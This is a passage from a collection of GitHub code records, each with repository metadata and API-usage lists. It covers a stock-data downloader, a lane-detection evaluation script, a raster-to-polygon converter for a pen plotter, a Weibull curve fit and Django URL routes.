finished!')\n\ndef get_all_sock_his_data(start, end, code=''):\n # 除了st的全部股票列表\n if code:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).filter(\n models.StockList.code == code).all()\n else:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).all()\n\n i = 1\n table_name = 'stock_his_data'\n # import pdb;pdb.set_trace()\n for stock in stocklist:\n df = ts.get_k_data(stock.code, start=start, end=end)\n df['name'] = stock.name\n #根据日期进行查重操作,对于数据库中已经存在的数据从df中剥离\n idx = 0\n # total_row = df.iloc[:,0].size\n while idx < df.iloc[:,0].size:\n date = df.iloc[idx]['date']\n d = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).filter(\n models.StockHisData.date == date).first()\n if not d:\n idx += 1\n else:\n df.drop(df.index[idx],inplace=True)\n\n df.to_sql(table_name, engine, if_exists='append', index=False)\n print('seq:{},{}({}) save to db succeed'.format(i, stock.name, stock.code))\n i += 1\n\n\n return\n\ndef update_percentage(code='',start='', end=''):\n # 除了st的全部股票列表\n if code:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).filter(\n models.StockList.code == code).all()\n else:\n stocklist = db_session.query(models.StockList).filter(models.StockList.id > 0).filter(\n models.StockList.name.notlike('%ST%')).all()\n\n\n i = 1\n for stock in stocklist:\n print('seq {}:try to update {}({}) percentage...'.format(i, stock.name, stock.code))\n i += 1\n if start and end:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).filter(\n models.StockHisData.date >= start).filter(models.StockHisData.date <= end).order_by(\n models.StockHisData.date.asc()).all()\n else:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).order_by(\n models.StockHisData.date.asc()).all()\n last_data = None\n for data in 
stock_datas:\n if not last_data:\n last_data = data\n continue\n else:\n data.percentage = round((data.close / last_data.close - 1) * 100, 2)\n last_data = data\n db_session.merge(data)\n db_session.commit()\n\n return\n\ndef update_ma5(code='',start='', end=''):\n # 除了st的全部股票列表\n if code:\n stocklist = db_session.query(models.StockList).filter(models.StockList.name.notlike('%ST%')).filter(\n models.StockList.code == code).all()\n else:\n stocklist = db_session.query(models.StockList).filter(models.StockList.id > 0).filter(\n models.StockList.name.notlike('%ST%')).all()\n\n\n i = 1\n for stock in stocklist:\n print('seq {}:try to update {}({}) ma5...'.format(i, stock.name, stock.code))\n i += 1\n if not start and not end:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).filter(\n models.StockHisData.date >= start).filter(models.StockHisData.date <= end).order_by(\n models.StockHisData.date.asc()).all()\n else:\n stock_datas = db_session.query(models.StockHisData).filter(models.StockHisData.code == stock.code).order_by(\n models.StockHisData.date.asc()).all()\n\n if len(stock_datas) < 5:\n continue\n\n for idx in range(4, len(stock_datas)):\n total = sum([stock_datas[idx].close, stock_datas[idx-1].close, stock_datas[idx-2].close, stock_datas[idx-3].close, stock_datas[idx-4].close])\n stock_datas[idx].ma5 = round(total/5, 2)\n db_session.merge(stock_datas[idx])\n db_session.commit()\n\n return\n\n\nif __name__ == '__main__':\n\n sock_list = ['000151']\n\n models.init_db()\n\n db_session = models.DBSession()\n\n init_sock_list()\n\n get_all_sock_his_data('2018-11-12', '2018-11-20')\n\n update_percentage(start='2018-11-12', end='2018-11-20')\n\n update_ma5(start='2018-11-06', end='2018-11-20')\n\n db_session.close()\n\n #ticks_get_date(sock_list, date='2018-03-05')\n\n # df = ts.get_today_ticks('300274')\n # # engine = create_engine('postgresql+psycopg2://sock-user:sock-password@10.6.3.29:15432/sock-db')\n #\n # #存入数据库\n # df.to_sql('tick_data',engine, if_exists='append', index_label='id')\n # df.filter()\n # import pdb;pdb.set_trace()\n\n#追加数据到现有表\n#df.to_sql('tick_data',engine,if_exists='append')", "repo_name": "shichao1986/daily_exercise", "sub_path": "stocket/datas.py", "file_name": "datas.py", "file_ext": "py", "file_size_in_byte": 6562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tushare.get_today_ticks", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tushare.get_tick_data", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tushare.get_today_all", "line_number": 43, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 64, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 67, "usage_type": "call"}, {"api_name": "tushare.get_k_data", "line_number": 73, "usage_type": "call"}, {"api_name": "models.StockHisData", 
"line_number": 80, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 97, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 101, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 111, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 113, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 114, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 114, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 131, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 131, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models.StockList", "line_number": 134, "usage_type": "attribute"}, {"api_name": "models.StockList.name.notlike", "line_number": 135, "usage_type": "call"}, {"api_name": "models.StockList", "line_number": 135, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 144, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 145, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 145, "usage_type": "attribute"}, {"api_name": "models.StockHisData", "line_number": 147, "usage_type": "attribute"}, {"api_name": "models.StockHisData.date.asc", "line_number": 148, "usage_type": "call"}, {"api_name": "models.StockHisData", "line_number": 148, "usage_type": "attribute"}, {"api_name": "models.init_db", "line_number": 166, "usage_type": "call"}, {"api_name": "models.DBSession", "line_number": 168, "usage_type": "call"}]}
+{"seq_id": "29777497074", "text": "import os\nimport numpy as np\nimport datetime\nfrom PIL import Image\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import transforms as transforms\n\nfrom datasets import culane\nimport transforms as extend_transforms\nfrom utils import check_mkdir, AverageMeter, evaluation, prob2lines\nfrom model import Baseline\nfrom torch.backends import cudnn\n\ncudnn.enable = True\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\nckpt_path = './ckpt'\nexp_name = 'model'\n\nargs = {\n 'checkpoint':'60000',\n 'val_size': [800, 288],\n 'save_results': True,\n 'deep_base': True,\n}\n\nmean = [0.3598, 0.3653, 0.3662]\nstd = [0.2573, 0.2663, 0.2756]\n\nimg_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n])\nmask_transform = extend_transforms.MaskToTensor()\nto_pil = transforms.ToPILImage()\nval_joint_transform = extend_transforms.Scale(args['val_size'])\n\n\ncriterion = torch.nn.CrossEntropyLoss(weight=torch.Tensor([0.4, 1, 1, 1, 1]).cuda(), size_average=True,\n ignore_index=culane.ignore_label)\ncriterion = criterion.cuda()\n\n\ndef main():\n net = Baseline(num_classes=culane.num_classes, deep_base=args['deep_base']).cuda()\n\n print('load checkpoint \\'%s.pth\\' for evaluation' % args['checkpoint'])\n pretrained_dict = torch.load(os.path.join(ckpt_path, exp_name, args['checkpoint'] + '_checkpoint.pth'))\n pretrained_dict = {k[7:]: v for k, v in pretrained_dict.items()}\n net.load_state_dict(pretrained_dict)\n\n net.eval()\n\n save_dir = os.path.join(ckpt_path, exp_name, 'vis_%s_test' % args['checkpoint'])\n check_mkdir(save_dir)\n log_path = os.path.join(save_dir, str(datetime.datetime.now()) + '.log')\n\n data_list = [l.strip('\\n') for l in open(os.path.join(culane.root, culane.list, 'test_gt.txt'), 'r')]\n\n loss_record = AverageMeter()\n gt_all, prediction_all=[], []\n\n for idx in range(len(data_list)):\n print('evaluating %d / %d' % (idx + 1, len(data_list)))\n\n img = Image.open(culane.root + data_list[idx].split(' ')[0]).convert('RGB')\n gt = Image.open(culane.root + data_list[idx].split(' ')[1])\n\n img, gt = val_joint_transform(img, gt)\n\n with torch.no_grad():\n img_var = Variable(img_transform(img).unsqueeze(0)).cuda()\n gt_var = Variable(mask_transform(gt).unsqueeze(0)).cuda()\n\n prediction = net(img_var)[0]\n\n loss = criterion(prediction, gt_var)\n loss_record.update(loss.data, 1)\n\n scoremap = F.softmax(prediction, dim=1).data.squeeze().cpu().numpy()\n\n prediction = prediction.data.max(1)[1].squeeze().cpu().numpy().astype(np.uint8)\n prediction_all.append(prediction)\n gt_all.append(np.array(gt))\n\n if args['save_results']:\n check_mkdir(save_dir + data_list[idx].split(' ')[0][:-10])\n out_file = open(os.path.join(save_dir, data_list[idx].split(' ')[0][1:-4] + '.lines.txt'), 'w')\n prob2lines(scoremap, out_file)\n\n acc, acc_cls, mean_iu, fwavacc = evaluation(prediction_all, gt_all, culane.num_classes)\n log = 'val results: loss %.5f acc %.5f acc_cls %.5f mean_iu %.5f fwavacc %.5f' % \\\n (loss_record.avg, acc, acc_cls, mean_iu, fwavacc)\n print(log)\n open(log_path, 'w').write(log + '\\n')\n\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "britney-f/SALMNet", "sub_path": "eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 3386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.backends.cudnn.enable", "line_number": 17, "usage_type": 
"attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 17, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "transforms.MaskToTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "transforms.Scale", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 42, "usage_type": "call"}, {"api_name": "datasets.culane.ignore_label", "line_number": 43, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 43, "usage_type": "name"}, {"api_name": "model.Baseline", "line_number": 48, "usage_type": "call"}, {"api_name": "datasets.culane.num_classes", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "utils.check_mkdir", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "datasets.culane.root", "line_number": 61, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 61, "usage_type": "name"}, {"api_name": "datasets.culane.list", "line_number": 61, "usage_type": "attribute"}, {"api_name": "utils.AverageMeter", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "datasets.culane.root", "line_number": 69, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "datasets.culane.root", "line_number": 70, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", 
"line_number": 75, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.check_mkdir", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "utils.prob2lines", "line_number": 92, "usage_type": "call"}, {"api_name": "utils.evaluation", "line_number": 94, "usage_type": "call"}, {"api_name": "datasets.culane.num_classes", "line_number": 94, "usage_type": "attribute"}, {"api_name": "datasets.culane", "line_number": 94, "usage_type": "name"}]}
+{"seq_id": "28140287755", "text": "import numpy as np\nimport potrace\nimport cv2\nimport matplotlib.pyplot as plt\n\n\nclass Polygon:\n def __init__(self, points):\n self.points = points\n self.children = ()\n\n\nclass Drawing:\n def __init__(self, polygons):\n self.polygons = polygons\n self.fillings = ()\n self.bounds = ()\n \n\n\ndef add_vertical_lines(img):\n for i in range(img.shape[1]):\n if i % 2 == 0:\n continue\n img[:, i] = 255\n return img\n\n\n# A recursive function that decomposes a curve into polygons\n# The recursion takes care of the children of the curve\ndef decompose_to_polygons(parent, curve):\n points = []\n for segment in curve:\n c = segment.c\n e = segment.end_point\n points.append(c)\n points.append(e)\n points = np.array(points)\n\n p = Polygon(points)\n parent.children += (p,)\n\n for child in curve.children:\n decompose_to_polygons(p, child)\n\n\ndef to_polygons(img, fill=False):\n img_copy = img.copy() # Don't modify the original image\n # Scale up the image so that the longest dimension is 1200 pixels and the aspect ratio is preserved\n biggest_dim = max(img_copy.shape)\n scale_factor = 1200 / biggest_dim\n img_copy = cv2.resize(img_copy, None, fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_AREA)\n if len(img.shape) == 3:\n gray = cv2.cvtColor(img_copy, cv2.COLOR_BGR2GRAY)\n else:\n gray = img_copy\n data = gray < 200 # Convert to 2D boolean array\n data = np.flipud(data) # Flip the image vertically, since Potrace's origin is in the top-left corner\n bmp = potrace.Bitmap(data)\n path = bmp.trace(\n turdsize=0,\n turnpolicy=potrace.TURNPOLICY_MINORITY,\n alphamax=0,\n opticurve=1,\n opttolerance=0\n )\n\n # For my pen plotter, I prefer to convert every curve to a list of points\n # Since I set alphamax to 0, all curves should be corners\n # Connecting the corners with straight lines will result in a polygon\n # The entire image will be a list of polygons\n # This will make it easy for the pen plotter to draw the image\n # All it needs to do is, for each polygon, move the pen to all the points in the polygon\n # Lift the pen, move to the next polygon, and repeat\n root = Polygon(())\n for curve in path.curves_tree:\n decompose_to_polygons(root, curve)\n\n if fill:\n img_with_lines = add_vertical_lines(img_copy)\n root2_children = to_polygons(img_with_lines, fill=False).children\n root.children += root2_children\n\n return root\n\n\nCOLORS = ['b', 'r'] # Colors for the borders of the polygons\nFILL_COLORS = ['w', 'k'] # Colors for the fill of the polygons\n\n\ndef draw_poly(poly, show_borders, show_filling, ax=plt, depth=0):\n\n points = poly.points\n\n # Fill the polygon\n if show_filling:\n fill_color = FILL_COLORS[depth % len(FILL_COLORS) - 1] # -1 since the first polygon doesn't count\n ax.fill(\n points[:, 0], # x-coordinates.\n points[:, 1], # y-coordinates.\n fill_color\n )\n\n for child in poly.children:\n draw_poly(child, show_borders, show_filling, ax, depth + 1)\n\n if show_borders:\n color = COLORS[depth % len(COLORS)]\n ax.plot(\n points[:, 0], # x-coordinates.\n points[:, 1], # y-coordinates.\n color + '-' # Styling (blue, solid line).\n )\n # Draw a line between the first and last points.\n ax.plot(\n [points[0, 0], points[-1, 0]], # x-coordinates of first and last points.\n [points[0, 1], points[-1, 1]], # y-coordinates of first and last points.\n color + '-' # Styling (blue, solid line).\n )\n\n\ndef draw_polygons(root, show_borders=True, show_filling=True, ax=plt):\n for polygon in root.children:\n draw_poly(polygon, show_borders, 
show_filling, ax, 0)\n\n # Make ax have the same ratio as the image.\n try:\n ax.set_aspect('equal', adjustable='box', anchor='C')\n except:\n ax.gca().set_aspect('equal', adjustable='box')\n\n\ndef get_bounds(root):\n # Since root contains the biggest polygons, we don't need to check the child polygons\n xmin = np.inf\n xmax = -np.inf\n ymin = np.inf\n ymax = -np.inf\n for polygon in root.children:\n xmin = min(xmin, np.min(polygon.points[:, 0]))\n xmax = max(xmax, np.max(polygon.points[:, 0]))\n ymin = min(ymin, np.min(polygon.points[:, 1]))\n ymax = max(ymax, np.max(polygon.points[:, 1]))\n\n return xmin, xmax, ymin, ymax\n\n\ndef scale_polygons(root, scale):\n for polygon in root.children:\n polygon.points *= scale\n scale_polygons(polygon, scale)\n\n\ndef translate_polygons(root, x, y):\n for polygon in root.children:\n polygon.points[:, 0] += x\n polygon.points[:, 1] += y\n translate_polygons(polygon, x, y)\n\n\ndef adjust_polygons_bounds(root, xmin, xmax, ymin, ymax):\n current_xmin, current_xmax, current_ymin, current_ymax = get_bounds(root)\n xdiff = xmax - xmin\n ydiff = ymax - ymin\n scale = min(xdiff / (current_xmax - current_xmin), ydiff / (current_ymax - current_ymin))\n scale_polygons(root, scale)\n translate_polygons(root, xmin - current_xmin, ymin - current_ymin)\n return root\n\n\nif __name__ == \"__main__\":\n IMAGE_PATH = \"../TestImages/levi_edge.png\"\n data = cv2.imread(IMAGE_PATH)\n polygons = to_polygons(data, fill=True)\n # Plot the polygons and the original image\n fig, (ax1, ax2) = plt.subplots(1, 2)\n # Plot the polygons on the left subplot\n draw_polygons(polygons, show_borders=True, show_filling=False, ax=ax1)\n ax1.grid()\n ax1.title.set_text('Polygons')\n # Plot the original image on the right subplot\n ax2.imshow(data)\n ax2.title.set_text('Original Image')\n # Show the figure\n plt.show()\n", "repo_name": "Yonni123/PenPlotter", "sub_path": "Python/RasterToVector.py", "file_name": "RasterToVector.py", "file_ext": "py", "file_size_in_byte": 5856, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 52, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.flipud", "line_number": 58, "usage_type": "call"}, {"api_name": "potrace.Bitmap", "line_number": 59, "usage_type": "call"}, {"api_name": "potrace.TURNPOLICY_MINORITY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 143, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 173, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.subplots", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}]}
+{"seq_id": "23403961611", "text": "#!/usr/bin/env python2\n# Ensures you use only the python2.X on your machine\n# Author: Mohammadali Ghasemi\n\nimport numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\nimport time\nstart_time = time.time()\n\narr = np.genfromtxt('myspace.csv', delimiter=\",\")[:, 1]\n\nh = arr[arr > 0]\nN = int(np.sum(h))\nx = np.arange(1, len(h) + 1, dtype='float')\n\n\ndef getDerivation(h, x, N, kappa, alpha):\n L_k = N / kappa - N * np.log(alpha) + np.sum(h * np.log(x)) - np.sum(h * (x / alpha) ** kappa * np.log(x / alpha))\n L_a = kappa / alpha * (np.sum(h * (x / alpha) ** kappa) - N)\n\n return np.asscalar(L_a), np.asscalar(L_k)\n\n\ndef derivativeCalculator(y, t0, h, x, N):\n kappa, alpha = y\n return getDerivation(h, x, N, alpha, kappa)\n\n\nplt.plot(x, h / N)\nt = np.linspace(0, 10, 30)\ny = odeint(derivativeCalculator, (1., 1.), t, args=(h, x, N), mxstep=5000000)\nres_alpha, res_kappa = y[-1, :]\n\n\ndef weib(x, k, a):\n return (k / a) * (x / a) ** (k - 1) * np.exp(-(x / a) ** k)\n\nprint(\"K: \",res_kappa,\" Alpha: \",res_alpha)\n\nplt.plot(x, weib(x, res_kappa, res_alpha))\nplt.show()", "repo_name": "imghasemi/Pattern-Recognition", "sub_path": "Project 1/Task 1.3/task1.3_ode_ali.py", "file_name": "task1.3_ode_ali.py", "file_ext": "py", "file_size_in_byte": 1098, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asscalar", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.integrate.odeint", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "7246759102", "text": "\"\"\"\nDefinition of urls for TextNLPVisualiser.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url, include\nfrom django.urls import path\nfrom django.contrib import admin\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom app import forms, views\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n path('', views.home, name='home'),\n path('contact/', views.contact, name='contact'),\n path('about/', views.about, name='about'),\n path('login/',\n LoginView.as_view\n (\n template_name='app/login.html',\n authentication_form=forms.BootstrapAuthenticationForm,\n extra_context=\n {\n 'title': 'Log in',\n 'year' : datetime.now().year,\n }\n ),\n name='login'),\n path('logout/', LogoutView.as_view(next_page='/'), name='logout'),\n path('admin/', admin.site.urls),\n path('segmentation/', views.segmentation, name='segmentation' ),\n path('tokenization/', views.tokenization, name='tokenization' ),\n path('tagger/', views.tagger, name='tagger' ),\n path('chunk/', views.chunk, name='chunk' ),\n path('application/', views.application, name='application' ),\n path('application/process', views.process, name='process' ),\n]\n", "repo_name": "mokrdd/TextVisualiser", "sub_path": "TextNLPVisualiser/TextNLPVisualiser/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1343, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "app.views.home", "line_number": 15, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "app.views.contact", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "app.views.about", "line_number": 17, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 19, "usage_type": "name"}, {"api_name": "app.forms.BootstrapAuthenticationForm", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 31, 
"usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "app.views.segmentation", "line_number": 32, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "app.views.tokenization", "line_number": 33, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "app.views.tagger", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "app.views.chunk", "line_number": 35, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "app.views.application", "line_number": 36, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "app.views.process", "line_number": 37, "usage_type": "attribute"}, {"api_name": "app.views", "line_number": 37, "usage_type": "name"}]}
